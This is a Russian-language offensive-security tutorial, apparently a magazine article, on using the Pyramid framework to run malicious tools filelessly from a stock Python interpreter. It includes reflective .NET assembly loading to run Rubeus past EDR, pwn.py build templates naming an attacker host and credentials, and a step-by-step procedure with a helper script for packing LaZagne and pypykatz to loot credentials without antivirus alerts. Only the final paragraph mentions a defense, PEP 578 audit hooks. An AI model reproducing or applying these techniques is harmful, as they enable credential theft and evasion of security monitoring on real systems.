import clr import zlib import base64 clr . AddReference ( 'System' ) from System import * from System. Reflection import * b64 = base64 . b64encode ( zlib . decompress ( base64 . b64decode ( b'< ASSEMBLY_BYTES_BASE64> ' ))) . decode ( ) raw = Convert . FromBase64String ( b64 ) assembly = Assembly . Load ( raw ) type = assembly . GetType ( 'Namespace. Type' ) type . GetMethod ( 'Method' ) . Invoke ( Activator . CreateInstance ( type ) , None )

www Вот тут вот вся­кие блю­тиме­ры ковыря­ют мал­варный лоадер на IronPython, дела­ющий при­мер­но то же самое: Snakes on a Domain: An Analysis of a Python Malware Loader

Eще один скрипт на колен­ке с ука­зани­ем зависи­мос­тей, что­бы соб­рать тем­плей­ты воеди­но, и мож­но запус­кать Rubeus на машине с EDR.

#!/ usr/ bin/ env bash cat < < EOT > pwn. py PYRAMID_HOST = '10. 10. 13. 37' PYRAMID_PORT = '443' PYRAMID_USERNAME = 'attacker' PYRAMID_PASSWORD = 'Passw0rd1!' PYRAMID_TO_UNPACK = ( 'pythonnet', ) PYRAMID_TO_IMPORT = ( 'cffi', 'pycparser', ) EOT cat { cfinder, clr } .py > > pwn. py

LaZagne

Пом­ня о меч­те мно­гих моих кол­лег по цеху запус­кать сбор­щик лута LaZagne из памяти, воп­лощение этой идеи — пер­вое, чем я занял­ся, ког­да начал играть с Pyramid. На этом при­мере покажем, как мож­но пор­тировать любой питонов­ский модуль для бес­фай­лового импорта с помощью CFinder.

Для начала сос­тавим спи­сок зависи­мос­тей, которые нам понадо­бят­ся для кор­рек­тно­го запус­ка LaZagne. Я делал это методом проб и оши­бок, потому что я ленивый, но пра­виль­нее было бы пос­мотреть на requirements.txt «Лазаньи», потом на install_requires Pypykatz и выч­ленить из это­го спис­ка толь­ко то, что реаль­но исполь­зует­ся в LaZagne. У меня получил­ся такой спи­сок:

#!/ usr/ bin/ env bash cat < < EOT > pwn. py PYRAMID_HOST = '10. 10. 13. 37' PYRAMID_PORT = '443' PYRAMID_USERNAME = 'attacker' PYRAMID_PASSWORD = 'Passw0rd1!' PYRAMID_TO_UNPACK = ( 'Cryptodome', ) PYRAMID_TO_IMPORT = ( 'future', 'pyasn1', 'rsa', 'asn1crypto', 'unicrypto', 'minidump', 'minikerberos', 'pypykatz', 'lazagne', ) LAZAGNE_MODULE = 'all' LAZAGNE_VERBOSITY = '-vv' # '' / '-v' / '-vv' EOT cat { cfinder, lazagne } .py > > pwn. py

Выг­рузим все зависи­мос­ти в исходни­ках локаль­но к себе на машину:

$ wget https:/ / files. pythonhosted. org/ packages/ 45/ 0b/ 38b06fd9b92dc2b68d58b75f900e97884c45bedd2ff83203d933cf5851c9/ future- 0. 18. 2. tar. gz $ tar -xf future- 0. 18. 2. tar. gz & & rm future- 0. 18. 2. tar. gz $ git clone https:/ / github. com/ etingof/ pyasn1 $ wget https:/ / files. pythonhosted. org/ packages/ aa/ 65/ 7d973b89c4d2351d7fb232c2e452547ddfa243e93131e7cfa766da627b52/ rsa- 4. 9. tar. gz $ tar -xf rsa- 4. 9. tar. gz & & rm rsa- 4. 9. tar. gz $ git clone https:/ / github. com/ wbond/ asn1crypto $ git clone https:/ / github. com/ skelsec/ unicrypto $ git clone https:/ / github. com/ skelsec/ minidump $ git clone https:/ / github. com/ skelsec/ minikerberos $ git clone https:/ / github. com/ skelsec/ pypykatz $ git clone https:/ / github. com/ AlessandroZ/ LaZagne

Те­перь в каж­дом из фай­лов .py нам нуж­но заменить отно­ситель­ные импорты абсо­лют­ными с ука­зани­ем пол­ного пути до модуля (потому что в зипах, которые мы дер­жим в питонов­ской памяти, нет понятия отно­ситель­ных путей), то есть что­бы в конеч­ных упа­кован­ных модулях не было такого.

Опять же, не силь­но замора­чива­ясь, я наб­росал прос­тень­кий скрипт (глав­ное — что­бы работал!), который про­ходит по всем исходни­кам и регуляр­ками при­водит «сло­ман­ные» импорты в нуж­ный нам вид:

#!/ usr/ bin/ env python3 import os import re import sys from glob import glob from pathlib import Path from zipfile import ZipFile from binaryornot. check import is_binary base_cwd = os . getcwd ( ) os . chdir ( sys . argv [ 1 ] ) cwd = Path . cwd () . stem for file in glob ( str ( '**/ *. py' ) , recursive = True ) : if not is_binary ( file ) : import_path = str ( ( Path ( cwd )) . joinpath ( file ) . parent ) import_path = import_path . replace ( '. py' , '' ) . replace ( '/ ' , '. ' ) with open ( file , 'r' , encoding = 'utf-8' ) as f : contents = f . read ( ) # ( from . ) import -> ( from qwe. asd ) import contents = re . sub ( r'from\ s+\.\ s+' , f'from { import_path } ' , contents ) # ( from . a) bc import -> ( from zxc. a) bc import contents = re . sub ( r'from\ s+\.([ a-zA-Z]) ' , f'from { import_path } . \ \ 1' , contents ) with open ( file , 'w' , encoding = 'utf-8' ) as f : f . write ( contents ) os . chdir ( '.. ' ) os . system ( f'zip -qr { cwd } . zip { cwd } ' ) os . system ( f'mv { cwd } . zip { base_cwd } ' )

За­пус­тив скрипт с ука­зани­ем пути до каж­дого паку­емо­го модуля, ты получишь в текущей дирек­тории все зипы, необ­ходимые для запус­ка лутера.

$ . / fix_ imports. py future- 0. 18. 2/ src/ future $ . / fix_ imports. py pyasn1/ pyasn1 $ . / fix_ imports. py rsa- 4. 9/ rsa/ $ . / fix_ imports. py asn1crypto/ asn1crypto $ . / fix_ imports. py unicrypto/ unicrypto $ . / fix_ imports. py minidump/ minidump $ . / fix_ imports. py minikerberos/ minikerberos $ . / fix_ imports. py pypykatz/ pypykatz $ . / fix_ imports. py LaZagne/ Windows/ lazagne

Ко­неч­но, это не все манипу­ляции, которые мне приш­лось про­делать с исходни­ками LaZagne, что­бы она кор­рек­тно запус­тилась на Python 3, но это уже аспекты, спе­цифич­ные для каж­дого модуля. Конеч­ный резуль­тат работы мож­но наб­людать в ре­пози­тории авто­ра Pyramid.

Как итог име­ем страш­ный сон опе­ратив­ника SOC наяву — воз­можность запус­тить LaZagne без алер­тов от AV!

Выводы

Се­год­ня мы рас­смот­рели очень пер­спек­тивный, на мой взгляд, спо­соб бес­фай­ловой дос­тавки и исполне­ния мал­варно­го кода из сле­пой зоны AV или EDR — «ваниль­ного» интер­пре­тато­ра Python. Те при­меры, которые мы разоб­рали, — все­го лишь вер­хушка айсбер­га: нап­ример, в C2-фрей­мвор­ке Pupy автор вооб­ще исполь­зует пересоб­ранный интер­пре­татор, который заг­ружа­ется из памяти по прин­ципу Reflective DLL и ко все­му про­чему уме­ет исполь­зовать рас­ширения . pyc и . pyd без их записи на диск.

Дру­гой при­мер — агент Medusa C2-фрей­мвор­ка Mythic, спо­соб­ный уда­лен­но им­порти­ровать из памяти тре­буемые зависи­мос­ти Python по коман­де опе­рато­ра.

Что­бы улуч­шить Pyramid, мож­но было бы написать вспо­мога­тель­ные фун­кции для импорта зависи­мос­тей из еди­ного зашиф­рован­ного архи­ва, который мож­но положить на диск рядом с интер­пре­тато­ром — это будет полез­но, ког­да ата­кующий не может дер­нуть зипы по HTTP. Оставлю это в качес­тве домаш­него задания для читате­ля.

И напос­ледок о том, как защитить­ся от все­го это­го зме­ино­го бес­пре­дела: есть такая кон­цепци,я как Python Runtime Audit Hooks, пред­ложен­ная в PEP 578. В ее рам­ках раз­работ­чикам, адми­нис­тра­торам и самому защит­ному ПО интер­пре­татор пре­дос­тавля­ет интерфей­сы, что­бы отсле­живать все то непонят­ное и заведо­мо опас­ное, что про­исхо­дит под его кры­лом (нап­ример, что переда­ется фун­кци­ям compile , exec , eval , import ). И это даже помог­ло бы защитить­ся от логики импорта модулей, реали­зован­ной в Pyramid.